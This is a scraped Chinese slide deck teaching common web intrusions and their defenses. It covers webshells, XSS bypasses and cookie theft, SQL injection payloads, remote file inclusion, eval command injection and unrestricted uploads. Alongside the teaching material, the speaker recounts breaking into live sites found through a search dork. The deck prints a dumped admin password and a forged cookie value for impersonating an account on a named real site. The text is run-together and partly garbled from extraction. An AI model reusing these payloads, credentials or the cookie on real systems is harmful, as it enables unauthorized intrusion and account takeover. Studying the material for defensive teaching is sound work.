常见入侵和防御.ppt

上传人:wuy****n92 文档编号:75298257 上传时间:2023-03-03 格式:PPT 页数:25 大小:883KB
返回 下载 相关 举报
常见入侵和防御.ppt_第1页
第1页 / 共25页
常见入侵和防御.ppt_第2页
第2页 / 共25页
点击查看更多>>
资源描述

《常见入侵和防御.ppt》由会员分享,可在线阅读,更多相关《常见入侵和防御.ppt(25页珍藏版)》请在得力文库 - 分享文档赚钱的网站上搜索。

1、常见入侵和防御讲解人 王秋石联系方什么算入侵成功获取网站的后台管理权限,比重5%,当然了,也要看后台的功能是否强大。可以执行任意的php代码,得到webshell,这样你就可以查看修改服务器上的任意文件,如果网站配置不当,你还可以直接运行系统命令,比重80%,常见的入侵,基本到这儿结束,获得服务器的系统权限,如windows,可以用3389直连,或者linux获取root权限,给自己加个帐号,ssh,等,比重15%一句话木马一句话木马的用处就是一句话,非常方便,但是功能强大一句php代码,内容如下可以执行,我传过去的任意命令,比如文件的增删改查正常你完成一个网站的入侵,留后门的时候,它就非常方

2、便了常见的入侵方式1网站漏洞2服务器漏洞3社会工程学4其它网站漏洞常见的网站入侵方式跨站万能密码注入文件包含任意命令执行任意文件上传跨站方法跨站方法通过css来跨站,比较少见鸡肋型跨站,不写入数据库直接写入script标签onload事件,onerror事件javascript协议常见突破方式1.针对过滤script标签,可以尝试script2.可以用img标签的onload属性3.img的onload,onerror属性被过滤,可以用style属性,用css的expression来执行js代码4.长度有限制,除非在php里进行了限制,前台的js限制,或者maxlength 属性,可以用fir

3、ebug直接修改5.可以用link标签引用外部的css文件6.如果是编辑器,可以用firebug直接添加各种标签跨站的用处跨站蠕虫钓鱼管理员cookie通过js的ajax功能,自动传播,特别是在社区,或者论坛获取管理员cookie进行cookie欺骗登录弹出,钓鱼页面,诱使用户提交敏感信息跨站的用处跨站蠕虫比如某社区的日志,可以跨站,你只需要在日志中加入js代码,让访问者自动也发一篇日志,该日志也有你的跨站js代码,这就是跨站蠕虫。一旦有人中招,传播速度非常快,可以用来广告,或者,宣传舆论,各种作用,全看怎么利用;爱房的个人资料修改的签名里,可以跨站,但是只有ie6有效,加入如下代码,回复帖子

4、即可imgjavascript:alert(1)/img跨站的用处钓鱼在跨站的页面加js,js弹出一个页面,和某网站做的一模一样,比如当前社区的登录页。比如一个社区网站,你正在浏览某日志,突然跳出一个登录页,这样你如果不注意的话,很容易就把你的帐号密码泄漏,或者弹出一个中奖信息,各种骗就是了跨站的用处获取cookie比如一个网站有个留言板,管理员可能会经常去查看留言,这是时候如果某篇留言加了js代码,js代码把当前的管理员cookie发送到指定地址,我时刻监听是否收到cookie,在管理员还没有退出登录之前,我只要把我的cookie 改成,我收到的cookie,即可成为登录身份,达到进入网站的

5、后台,这也是入侵的常见的一种方式我对爱房的网站的用户验证系统研究了一下,发现有点小问题,打开用cookie管理工具把aQQ_ajkauthinfos的值改成如下511wkh05CFqYDxcriAB7ATTxfNu%2FpXYr557Lr5blo%2FWPgrcK%2FQ%22就可以摇身一变成,”集团市场部“的身份。如何防御跨站跨站的防御html_specialchars()函数如果允许用户输入html,那么只允许一些特定的标签,或者采取自定义标签的模式,比如img/img,其它的html标签用strip_tags()函数全部过滤文本编辑器,对允许的特定标签进行重写,比如要匹配到img 然后将

6、属性重写,其它的标签统统过滤掉,这儿的逻辑是,“只允许某几个标签”,而不是,“有些标签不行”如果某主页允许用户自定义css,比如以前的renren网的涂鸦板,一定要注意expression,可以用一个while循环,不断的过滤expression,防止用户写成exprexpressionession的形式万能密码造成原因:后台登录没有对用户传过来的字符进行过滤,直接代入数据库查询,而且,判断用户和密码的sql语句写成如下方式:Select*from admin where username=$username and password=$password只要我把username写成如下方式1

7、or 1=1 or=那么sql语句就变成Select*from admin where username=1 or 1=1 or=and password=$password所以直接登录成功,现在这种漏洞很少见防御办法:对传过来的数据addslashes即可,或者sql语句分两步写,addslashes会自动对单引号和双引号进行转义文件包含1.漏洞成因,程序包含了用户指定的文件,比如用户上传的某张图片,因为一个正常的网站,许多都是允许用户上传图片的,假设这张图片里边是一段php代码,只是扩展名改成.jpg的话,那么就可以执行任意用户指定的php命令了比如常见的controller,对一个链接/

8、?ac=edit&id=1,他会包含 controller底下的edit.php,我只要把链接改成/?ac=http:/www.myweb/edit&id=1它就会include(“http:/www.myweb/edit.php”)这样就执行了我的代码2.当然不一定是这种情况,还有其它的形式防御办法,可以把你要包含的文件写成一个列表,对ac进行判断是否在这个列表中,比如discuz就是这样做的任意命令执行1.产生原因,没有过滤用户传过来的数据,例子:假设这又有一个controller,他会针对某个请求执行一个方法,比如/?main=news&ac=edit&id=1,它会执行news类的ed

9、it方法,代码是这样写的eval($news.”-”.”edit(”.$id.”)”);这个时候我任意构造main或者ac或者id都可一执行任意的代码,比如我构造main为fwrite(fopen(“1.php”,”w”),”);$news那么eval就是fwrite(fopen(“1.php”,”w”),”);$news-edit(1)这样就成功写入了一个php文件防御办法:同文件包含漏洞,或者做一些字符串的判断任意文件上传1.漏洞成因,用户可以上传任意格式的文件,比如php文件,php文件其实是个木马,比如一个磁盘管理器,或者是一句话木马防御办法:严格判断用户上传文件的扩展名,逻辑是:只允

10、许某几种格式,而不是不允许某几种非法格式神马叫注入把用户提交过来的数据,代入数据库查询比如,进行条件查询把数据当表名查询注入的类型数字型注入最经典的注入,sql语句如下,select*from news where id=$_GETidid没有经过任何过滤,直接代入数据库查询一个例子,去google搜inurl:php?id=,翻了半天,总算找到个有漏洞的,如下:请求文章不显示了文章不显示了请求请求 and 1=1 和和 and 1=2返回结果不同,判断可以注入,可以用返回结果不同,判断可以注入,可以用order by判断表判断表有多少列,然后通过有多少列,然后通过union联合查询得导管理员

11、密码,我获取列数是联合查询得导管理员密码,我获取列数是10,所以请求,所以请求 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from user帐号和密码会显示在文章的标题和内容位置,分别为帐号和密码会显示在文章的标题和内容位置,分别为admin密码密码:aspsir16接上边接上边得到了用户名和密码怎么找后台呢,试了admin|mange|amdin.php等等,都不行,去找google,在google上直接搜索:site: 管理,翻到第二页,总算找到后台地址如下:用刚才得到的帐号,成功登录,后台没啥功能,就是可以编辑一些学生

12、的资料神马,大家可以回去自己看,不过这个应该只是管理的一个分支,我又找到一个地址,也可以登录:应该还有新闻管理的,找不到了。针对这种漏洞的防御办法:将数字强制转换成数字,可以用intval函数,或者采取过滤关键词的方法,比如过滤select,union,等接上边接上边这种注入漏洞,还有一种情况,就是查询的结果没有显示出来,可以用(select count(*)from user where username like%a%)0进行逐个猜解注入的类型字符型注入字符行注入的常见sql语句为:Select*from user where username=$username;针对这种类型的查询,就需

13、要构造一下了,否则,会引号不闭合比如username=admin and=这样的话 sql就变成Select*from user where username=admin 这儿就可以加入我们的注入语句,无论是uinion还是猜解都可以的 and =注:一个网站的常见数字型注入漏洞很少,但是字符型注入出现的几率很大,特别是ajax请求的链接,特别容易出现,比如,验证用户名是否存在那块。几个例子http:/ from,等其它方式服务器漏洞:比如以前nginx有个路径解析错误1.jpg/.php会把1.jpg当作php执行apache以前会把.php开头的文件当作php来执行,比如.php.jpgapache还有许多漏洞:参考地址:http:/

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 教育专区 > 大学资料

本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知得利文库网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

工信部备案号:黑ICP备15003705号-8 |  经营许可证:黑B2-20190332号 |   黑公网安备:91230400333293403D

© 2020-2023 www.deliwenku.com 得利文库. All Rights Reserved 黑龙江转换宝科技有限公司 

黑龙江省互联网违法和不良信息举报
举报电话:0468-3380021 邮箱:hgswwxb@163.com